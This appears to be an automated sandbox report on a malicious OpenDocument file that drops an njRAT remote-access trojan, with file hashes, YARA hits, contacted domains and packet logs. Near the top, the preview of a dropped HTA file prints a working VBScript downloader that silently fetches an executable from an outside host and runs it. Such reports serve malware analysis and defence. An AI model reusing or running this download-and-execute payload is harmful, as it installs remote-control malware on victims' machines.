Preview:	..E.M.B.E.D. .P.a.c.k.a.g.e..... . .....E.M.B.E.D. .S.t.a.t.i.c.M.e.t.a.f.i.l.e..... . ..................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...$...&...(...P...T...X...Z...\...`...........................................................................................................................................................................................................................................................................................................................................................................................*5..CJ..OJ%.PJ%.QJ%.^J%.ph....q...............h..?....j....U

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4034EDD1-39EC-4103-8348-B2C91C1BCCBB}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Exploit (2).hta Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):	720
Entropy (8bit):	5.316829842793749
Encrypted:	false
MD5:	48B03D4DCA2DD0296F7BB7FC39E08C35
SHA1:	3BA7288276B3B7B1B54FF497ED73185BB0D58250
SHA-256:	7FE130492E8FE70C1675C43F468F34D204F9BD599D68BEC8F1D40EE62A387ACC
SHA-512:	04FE6BB27C9FE8E8486DD9E90ADA191A0537A106912BBA8ECF725A967AA0891E509467AAA5F0409F5C6E6D6996CC1E434FA19C2ED3CD0A9A2CF743A485D92486
Malicious:	false
Preview:	.<html>..<head>..<script language="VBScript">..Sub window_onload...const impersonation = 3...Const HIDDEN_WINDOW = 12...Set Locator = CreateObject("WbemScripting.SWbemLocator")...Set Service = Locator.ConnectServer()...Service.Security_.ImpersonationLevel=impersonation...Set objStartup = Service.Get("Win32_ProcessStartup")...Set objConfig = objStartup.SpawnInstance_...Set Process = Service.Get("Win32_Process")...Error = Process.Create("cmd.exe /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','%temp%\exploit.exe');Start-Process '%temp%\exploit.exe'", null, objConfig, intProcessID)...window.close()..end sub..</script>..</head>..</html>

C:\Users\user\AppData\Local\Temp\Exploit (2).hta:Zone.Identifier Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	27
Entropy (8bit):	3.9582291686698787
Encrypted:	false
MD5:	833C0EFD3064048FD6A71565CA115CCD
SHA1:	0E6D2A1D4B6AFA705EA6267EEED3655FD2B39B9D
SHA-256:	4A86B6E7D2544AFC717EAC2B60ADBED0F0C68D49D723B2123F65C64C76579FBF
SHA-512:	536C2BB6ED98C190CE98BE01A31BD05FE03D90532B5B4194CAA58671F43AD4D65F7F828D8AC1F43A6A13DCA581205416DA094CA4DACAEFACB8D901FC48CCEB7A
Malicious:	false
Preview:	[ZoneTransfer]..ZoneId=3..3

C:\Users\user\AppData\Local\Temp\dllhost.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\exploit.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes):	24064
Entropy (8bit):	5.523301129556402
Encrypted:	false
MD5:	2C0D5DF5FE0A7B992DAC6A94A3874D2B
SHA1:	D080A0C0AEEEF05967A6863A5A949AA0C0EB1179
SHA-256:	02000DDF92CEB363760ACC1D06B7CD1F05BE7A1CA6DF68586E77CF65F4C6963E
SHA-512:	6FA3E4C25F211C9150E46237391226C390ED4A4DE54010AA9FB384ECA763255279045B220AB40E6E1B2ADC07D9426935010B9A12390C009B7CC55CEB3CD34C66
Malicious:	true
Yara Hits:	Rule: CN_disclosed_20180208_c_RID2E71, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, Author: Florian Roth Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, Author: Brian Wallace @botnet_hunter
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{.9].................V..........~t... ........@.. ....................................@.................................0t..K.......@............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...@............X..............@..@.reloc...............\..............@..B................`t......H.......,K...)....../....................................................0..........r...p.....r...p...........r...p.....r-..p.....r7..p.....ry..p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....o....s.........s.....................r...p...........s......... ..............r)..p..............0..;.......~....o....o....r+..p~....(.....o.....o......%(.....(...............,,.......0..D.......~....o....o....r+..p~....(....o......(....o.....

C:\Users\user\AppData\Local\Temp\exploit.exe Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes):	24064
Entropy (8bit):	5.523301129556402
Encrypted:	false
MD5:	2C0D5DF5FE0A7B992DAC6A94A3874D2B
SHA1:	D080A0C0AEEEF05967A6863A5A949AA0C0EB1179
SHA-256:	02000DDF92CEB363760ACC1D06B7CD1F05BE7A1CA6DF68586E77CF65F4C6963E
SHA-512:	6FA3E4C25F211C9150E46237391226C390ED4A4DE54010AA9FB384ECA763255279045B220AB40E6E1B2ADC07D9426935010B9A12390C009B7CC55CEB3CD34C66
Malicious:	true
Yara Hits:	Rule: CN_disclosed_20180208_c_RID2E71, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\exploit.exe, Author: Florian Roth Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\exploit.exe, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\exploit.exe, Author: Brian Wallace @botnet_hunter
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{.9].................V..........~t... ........@.. ....................................@.................................0t..K.......@............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...@............X..............@..@.reloc...............\..............@..B................`t......H.......,K...)....../....................................................0..........r...p.....r...p...........r...p.....r-..p.....r7..p.....ry..p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....o....s.........s.....................r...p...........s......... ..............r)..p..............0..;.......~....o....o....r+..p~....(.....o.....o......%(.....(...............,,.......0..D.......~....o....o....r+..p~....(....o......(....o.....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\AutoformLiscence bls activation.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Sep 19 12:43:03 2019, mtime=Thu Sep 19 12:43:03 2019, atime=Mon Sep 30 16:55:28 2019, length=128458, window=hide
Size (bytes):	2264
Entropy (8bit):	4.5184816635375205
Encrypted:	false
MD5:	94D0F7EAF35C3A0650442A7C1081CE9E
SHA1:	17810096F66CDB241B702F4AF5B9CF0F12BB2EFE
SHA-256:	98F9200959998C4E81258A8EB8E1988682045BCE43124087DE3301E76A7DA008
SHA-512:	CA9AE7A7B1CA4104AE2C50355E726F3C1996606A964DE5A6EF351914270DB05AE135FC323A8AA284AB3DD6A11DAD4269E75D692D86D15127673BDA5AACA84468
Malicious:	false
Preview:	L..................F.... ...w.(.n..w.(.n..l.z>.w...............................P.O. .:i.....+00.../C:\...................t.1.....3O.l..Users.`.......:..3O.l...Z...............6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....V.1.....3Ocm..user..>......3OOl3Ocm.........................S.u.t.h.a.w.a.y.....z.1.....3Odm..Desktop.d......3OOl3Odm....B..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....>O. .AUTOFO~1.ODT..t......3Obm3Obm.........................A.u.t.o.f.o.r.m.L.i.s.c.e.n.c.e. .b.l.s. .a.c.t.i.v.a.t.i.o.n...o.d.t.......................-...8...[.............h.....C:\Users\..#...................\\932923\Users.user\Desktop\AutoformLiscence bls activation.odt.:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.u.t.o.f.o.r.m.L.i.s.c.e.n.c.e. .b.l.s. .a.c.t.i.v.a.t.i.o.n...o.d.t.........:..,.LB.)...Aq...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.3.1.2.3.0.2.0.1.4.-.2.7.9.6.6.0.5.8.5.-.3.5.1.1.6.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	147
Entropy (8bit):	4.69748273221213
Encrypted:	false
MD5:	6DB60CCC696C6A98637A507DE4A88AD0
SHA1:	0F3F2EA96D3E7B56A718E109A32601783D850E1F
SHA-256:	0DAAB9431461AE42034488F949A445500E025639190319F217FE55521FD0003E
SHA-512:	63BA46BF5341D47A7D088E22BDA18178EC40E047B50764657414F9567075BC2471E73F5BB1F0B1E2A560DA8AB316728807F93FCE12EFD57108CF259D4BA45148
Malicious:	false
Preview:	[misc???J??$]..AutoformLiscence bls activation.LNK=0..AutoformLiscence bls activation.LNK=0..[misc???J??$]..AutoformLiscence bls activation.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	2.3156047920561837
Encrypted:	false
MD5:	094C0BA597E41147E6007908A3D60CC8
SHA1:	0BE9563979F52077FE47E00D4705F009AF6919F8
SHA-256:	70B17796BDE6ED17AC9CFC4395E2A8159A6298D354C658D1682EA9CD742F2458
SHA-512:	D9F6CA2D36DF42F9E7F1273C50F648611E050CA6ABC811B0767EE9212EACCB499B7CB72767C00FADAF2EA021E9BFD34D06D492A442B55884A37C855B49D5AFD6
Malicious:	false
Preview:	.user...............................................S.u.t.h.a.w.a.y.........C.o.u.r.i.e.r. .N.e.w...C.o.u.r.i.e.r. .N.e.w...........C.o.u.r.i.e.r. .N.e.w...M.

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0BKVLLF6N8AXIVEESRXO.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.548149001650597
Encrypted:	false
MD5:	D039FDA2769B86F410EE083ED7EB70D7
SHA1:	2C6DA5FF7C8CD5CF14B3A483712A2BAF09E9E572
SHA-256:	8616D3D70ADF7F2E819AE684D0D1E959751D2059D8310A24283CFFAA51931ACE
SHA-512:	F75102BA614B5E5832669D61C85D77BABA924BE813187EE29D9BB6830E9FCE2EB38C4642BCC3AA833829A4D02979B84624BD48CF21C786EE2055AAB5D8AB18A9
Malicious:	false
Preview:	...................................FL..................F.".. ....b..>...#...>...#...>...k............................P.O. .:i.....+00.../C:\...................\.1.....lF.R. PROGRA~2..D.......:..lF.R.........................P.r.o.g.r.a.m.D.a.t.a.....X.1......I.Q. MICROS~1..@.......:...I.Q.........................M.i.c.r.o.s.o.f.t.....R.1.....M>O@. Windows.<.......:..M>O@...(.....................W.i.n.d.o.w.s.......1.....~F\O..STARTM~1..j.......:..~F\O...2...............@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....3OUl..Programs..f.......:...IoS...3...............<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1......IzE..ACCESS~1..l.......:..M>Z@...4...............B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:.%..WINDOW~1..R.......:.&.:.%...8.....................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:.& .WINDOW~1.LNK..Z.......:.&.:.&....)....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\dllhost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes):	24064
Entropy (8bit):	5.523301129556402
Encrypted:	false
MD5:	2C0D5DF5FE0A7B992DAC6A94A3874D2B
SHA1:	D080A0C0AEEEF05967A6863A5A949AA0C0EB1179
SHA-256:	02000DDF92CEB363760ACC1D06B7CD1F05BE7A1CA6DF68586E77CF65F4C6963E
SHA-512:	6FA3E4C25F211C9150E46237391226C390ED4A4DE54010AA9FB384ECA763255279045B220AB40E6E1B2ADC07D9426935010B9A12390C009B7CC55CEB3CD34C66
Malicious:	true
Yara Hits:	Rule: CN_disclosed_20180208_c_RID2E71, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe, Author: Florian Roth Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe, Author: Brian Wallace @botnet_hunter
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{.9].................V..........~t... ........@.. ....................................@.................................0t..K.......@............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...@............X..............@..@.reloc...............\..............@..B................`t......H.......,K...)....../....................................................0..........r...p.....r...p...........r...p.....r-..p.....r7..p.....ry..p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....o....s.........s.....................r...p...........s......... ..............r)..p..............0..;.......~....o....o....r+..p~....(.....o.....o......%(.....(...............,,.......0..D.......~....o....o....r+..p~....(....o......(....o.....

C:\Users\user\Desktop\~$toformLiscence bls activation.odt Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	2.3156047920561837
Encrypted:	false
MD5:	094C0BA597E41147E6007908A3D60CC8
SHA1:	0BE9563979F52077FE47E00D4705F009AF6919F8
SHA-256:	70B17796BDE6ED17AC9CFC4395E2A8159A6298D354C658D1682EA9CD742F2458
SHA-512:	D9F6CA2D36DF42F9E7F1273C50F648611E050CA6ABC811B0767EE9212EACCB499B7CB72767C00FADAF2EA021E9BFD34D06D492A442B55884A37C855B49D5AFD6
Malicious:	false
Preview:	.user...............................................S.u.t.h.a.w.a.y.........C.o.u.r.i.e.r. .N.e.w...C.o.u.r.i.e.r. .N.e.w...........C.o.u.r.i.e.r. .N.e.w...M.

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a.top4top.net	163.172.46.38	true	false		high
amibas8722.ddns.net	unknown	unknown	true	6%, Virustotal, Browse	unknown
1.top4top.net	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	WINWORD.EXE, 00000000.00000002.737062201.03570000.00000002.00000001.sdmp	false	Avira URL Cloud: safe Google Safe Browsing: safe	low
https://1.top4top.net/p_1301n6ked1.jpg	WINWORD.EXE, 00000000.00000002.750721612.09630000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
163.172.46.38	United Kingdom		12876	unknown	false

Static File Info

General
File type:	OpenDocument Text
Entropy (8bit):	7.982024820668964
TrID:	OpenDocument Text document (52553/2) 61.42% OpenDocument Format (generic) (25004/1) 29.22% ZIP compressed archive (8000/1) 9.35%
File name:	AutoformLiscence bls activation.odt
File size:	128458
MD5:	51963003ce31bb0106e20fa09920a240
SHA1:	4ebcfb56ce442bd90f7b9d08ccc5659b53d713fc
SHA256:	de8e85328b1911084455e7dc78b18fd1c6f84366a23eaa273be7fbe4488613dd
SHA512:	da5e6f1eab5cb439cfce0727c7afc4cb222c11087bddbac890d6259d194bc0480c0e82fd940650a44beb0391b9a048581701377f1255e9070e4373a67ea4cc77
SSDEEP:	3072:IiDyU2Xxm3Bp3kFZuzY5hh4+j8ygdxH66k+I9+:Igy9gBpkFZuz44rH71
File Content Preview:	PK.........i.N^.2.'...'.......mimetypeapplication/vnd.oasis.opendocument.textPK.........i.N...K\...b.......meta.xml..... .._...b......z.}...d.i..../..AW..........;.J.n.:atS...XpM....._..rS..;...r......T..E0..S.)z..!N8....{.M.........'.....]jt+B.........jG

File Icon


Icon Hash:	e0e6828288bcbcbc

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2019 19:56:32.947050095 CEST	49163	443	192.168.1.109	163.172.46.38
Sep 30, 2019 19:56:32.971592903 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:32.971841097 CEST	49163	443	192.168.1.109	163.172.46.38
Sep 30, 2019 19:56:32.992297888 CEST	49163	443	192.168.1.109	163.172.46.38
Sep 30, 2019 19:56:33.016570091 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.024893999 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.024945021 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.025019884 CEST	49163	443	192.168.1.109	163.172.46.38
Sep 30, 2019 19:56:33.025161982 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.044310093 CEST	49163	443	192.168.1.109	163.172.46.38
Sep 30, 2019 19:56:33.072470903 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.286417007 CEST	49163	443	192.168.1.109	163.172.46.38
Sep 30, 2019 19:56:33.294615030 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.294766903 CEST	49163	443	192.168.1.109	163.172.46.38
Sep 30, 2019 19:56:33.768775940 CEST	49163	443	192.168.1.109	163.172.46.38
Sep 30, 2019 19:56:33.830661058 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.879066944 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.879097939 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.879118919 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.879184961 CEST	49163	443	192.168.1.109	163.172.46.38
Sep 30, 2019 19:56:33.879241943 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.879312038 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.879348993 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.879441023 CEST	49163	443	192.168.1.109	163.172.46.38
Sep 30, 2019 19:56:33.879549026 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.879621983 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.879689932 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.879748106 CEST	49163	443	192.168.1.109	163.172.46.38
Sep 30, 2019 19:56:33.879772902 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.907269955 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.907381058 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.907432079 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.907481909 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.907535076 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.907557964 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.907574892 CEST	49163	443	192.168.1.109	163.172.46.38
Sep 30, 2019 19:56:33.907587051 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.907613993 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.907645941 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.907672882 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.907696009 CEST	443	49163	163.172.46.38	192.168.1.109
Sep 30, 2019 19:56:33.907787085 CEST	49163	443	192.168.1.109	163.172.46.38
Sep 30, 2019 19:56:33.919065952 CEST	49163	443	192.168.1.109	163.172.46.38

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2019 19:56:32.900871038 CEST	59041	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:56:32.910985947 CEST	53	59041	8.8.8.8	192.168.1.109
Sep 30, 2019 19:56:53.715348959 CEST	61681	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:56:53.736150026 CEST	53	61681	8.8.8.8	192.168.1.109
Sep 30, 2019 19:56:55.740056038 CEST	55631	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:56:55.757930040 CEST	53	55631	8.8.8.8	192.168.1.109
Sep 30, 2019 19:56:57.778354883 CEST	58464	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:56:57.800257921 CEST	53	58464	8.8.8.8	192.168.1.109
Sep 30, 2019 19:56:59.836250067 CEST	49809	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:56:59.855978012 CEST	53	49809	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:01.871759892 CEST	55201	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:01.891043901 CEST	53	55201	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:03.911915064 CEST	54614	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:03.933273077 CEST	53	54614	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:05.951246977 CEST	62538	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:05.969660997 CEST	53	62538	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:08.788209915 CEST	55874	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:08.806051016 CEST	53	55874	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:10.838875055 CEST	50005	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:10.859049082 CEST	53	50005	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:12.871876001 CEST	52004	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:12.882231951 CEST	53	52004	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:14.916412115 CEST	54095	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:14.927092075 CEST	53	54095	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:16.955725908 CEST	59488	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:16.971870899 CEST	53	59488	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:18.994354010 CEST	50210	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:19.012347937 CEST	53	50210	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:21.036051989 CEST	62299	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:21.046504021 CEST	53	62299	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:23.052674055 CEST	50371	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:23.071330070 CEST	53	50371	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:25.091790915 CEST	56973	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:25.107400894 CEST	53	56973	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:27.339652061 CEST	65124	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:27.350039005 CEST	53	65124	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:29.367206097 CEST	57306	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:29.377787113 CEST	53	57306	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:31.388187885 CEST	55789	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:31.406903982 CEST	53	55789	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:33.414738894 CEST	52885	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:33.427751064 CEST	53	52885	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:35.454436064 CEST	61843	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:35.471959114 CEST	53	61843	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:37.491142988 CEST	60388	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:37.508156061 CEST	53	60388	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:39.539130926 CEST	55244	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:39.555191040 CEST	53	55244	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:41.572222948 CEST	64381	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:41.582492113 CEST	53	64381	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:43.598114014 CEST	57521	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:43.616940975 CEST	53	57521	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:45.757297039 CEST	54319	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:45.775552034 CEST	53	54319	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:48.564148903 CEST	54313	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:48.574542046 CEST	53	54313	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:50.588753939 CEST	62563	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:50.619183064 CEST	53	62563	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:52.626724958 CEST	63655	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:52.644948006 CEST	53	63655	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:54.659141064 CEST	59103	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:54.670963049 CEST	53	59103	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:56.691517115 CEST	51529	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:56.707303047 CEST	53	51529	8.8.8.8	192.168.1.109
Sep 30, 2019 19:57:58.736772060 CEST	49843	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:57:58.746850967 CEST	53	49843	8.8.8.8	192.168.1.109
Sep 30, 2019 19:58:00.826756001 CEST	57928	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:58:00.837280035 CEST	53	57928	8.8.8.8	192.168.1.109
Sep 30, 2019 19:58:02.851628065 CEST	57291	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:58:02.869657993 CEST	53	57291	8.8.8.8	192.168.1.109
Sep 30, 2019 19:58:04.888936996 CEST	64711	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:58:04.904903889 CEST	53	64711	8.8.8.8	192.168.1.109
Sep 30, 2019 19:58:06.913865089 CEST	61187	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:58:06.931600094 CEST	53	61187	8.8.8.8	192.168.1.109
Sep 30, 2019 19:58:09.382396936 CEST	55980	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:58:09.401462078 CEST	53	55980	8.8.8.8	192.168.1.109
Sep 30, 2019 19:58:11.400198936 CEST	61223	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:58:11.409549952 CEST	53	61223	8.8.8.8	192.168.1.109
Sep 30, 2019 19:58:13.401148081 CEST	51013	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:58:13.411223888 CEST	53	51013	8.8.8.8	192.168.1.109
